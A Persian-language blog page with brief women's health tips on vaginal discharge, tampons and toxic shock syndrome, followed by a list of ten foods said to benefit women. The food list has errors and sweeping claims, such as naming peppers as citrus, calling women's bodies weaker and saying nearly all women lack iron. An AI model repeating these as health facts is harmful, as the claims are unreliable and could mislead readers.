در حالت طبیعی این ترشحات، بی‌رنگ و بی‌بو هستند، اما اگر ترشحات زرد رنگ یا سوزناک یا بد بو بودند، می‌توانند نشانه بروز عفونت یا قارچ باشند. در این صورت برای جلوگیری از پیشرفت عفونت باید به پزشک متخصص زنان مراجعه کرد.
4- آیا استفاده طولانی‌ مدت از تامپون، شوک توکسیک می‌آورد؟
سندروم شوک توکسیک به دلیل عفونت باکتریایی ایجاد می‌شود و با حملات ناگهانی تب و لرز، اسهال، تهوع، درد عضلانی و بثورات پوستی مشخص می‌شود. اگر تامپون‌ها به مدت طولانی بمانند، زمینه را برای ایجاد عفونت‌های باکتریایی آماده می‌کنند. بهترین وضعیت آن است که تامپون‌ها هر 8 ساعت یک بار تعویض شوند.



10 خوراکی مفید برای خانم ها
 
 
10 خوراکی مفید برای خانم ها
بدن خانم ها به دلیل عملکرد متفاوتی که از مردها دارد ، به همین دلیل به یک سری از مواد خوراکی خاص نیاز دارند .
بدن زنان به دلیل فعالیت های هورومونی متفاوتی که از مردها دارد و همین طور ضعیف تر بودن بدنشان نسبت به جنس مخالف ، باید یک سری از مواد غذایی را در تغذیه خود قرار دهند .
سیر :
سیر دارای فوایدی مانند : ضد باکتری، ضد انعقاد خون ، کاهش فشار خون و مشکلات عروقی – همین طور پیشگیری از سرطان های دستگاه گوارش و بیماری های قلبی و عروقی
پیاز :
پیاز حاوی مواد معدنی و همین طور از بین برنده باکتری و ویروس های بدن زنان است .
مرکبات :
مرکبات حاوی انتی اکسیدان هستند .
آنتی‌اکسیدان‌ها ترکیباتی هستند که باعث محافظت در برابر آسیب سلولی ناشی از مولکول‌هایی به نام رادیکال‌های آزاد می‌شوند
که در مرکباتی مانند : فلفل قرمز و سبز ، پرتقال ، لیمو ترش ، گریپ فوروت و ...
زردآلو :
زردآلو حاوی آنتی اکسیدان ، ویتامین آ ، سی است و همین طور دارای مقدار قابل توجهی از پتاسیم نیز هستند .
سیب :
سیب سرشار از ویتامین‌ها، تانن، مواد معدنی و فیبر است ، فشار خون را تنظیم می کند، برای دندان های بسیار موثر است زیرا خانم ها در برحه ای از زمان به دلیل بارداری و همین طور دوران شیردهی دچار سستی در دندان هایشان می شوند .
شاتوت :
شاتوت حاوی آهن و کلیسم است . معمولا تمام خانم ها با مشکلات آهن خونی روبرو هستند و اکثرا کمبود آهن در کم خونی ها دیده می شود .
قارچ :
قارچ ها حاوی ویتامین ب ، مینرال هستند . مینرال برای بدن زنان بسیار لازم و ضروری است .
غلات
سبزی های تازه با رنگ های سبز تیره و سبز روشن
پیازچه موجود در سبزی خوردن :
قسمت سفید و سبز سر پیازچه ، حاوی فیبر و ویتامین هستند .



صفحه قبل 1 صفحه بعد

درباره وبلاگ


به وبلاگ خودتان خوش آمدید امیدوارم که در این وبلاگ بتوانم نیاز شما دوست گرامی را برآورده سازم.
آخرین مطالب
آرشيو وبلاگ
نويسندگان
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان کافی نت و آدرس caffinet.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.








نام :
وب :
پیام :
2+2=:
(Refresh)

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز :
بازدید دیروز :
بازدید هفته :
بازدید ماه :
بازدید کل :
تعداد مطالب : 562
تعداد نظرات : 8
تعداد آنلاین : 1


Alternative content


آریان پیامک
آریان اس ام اس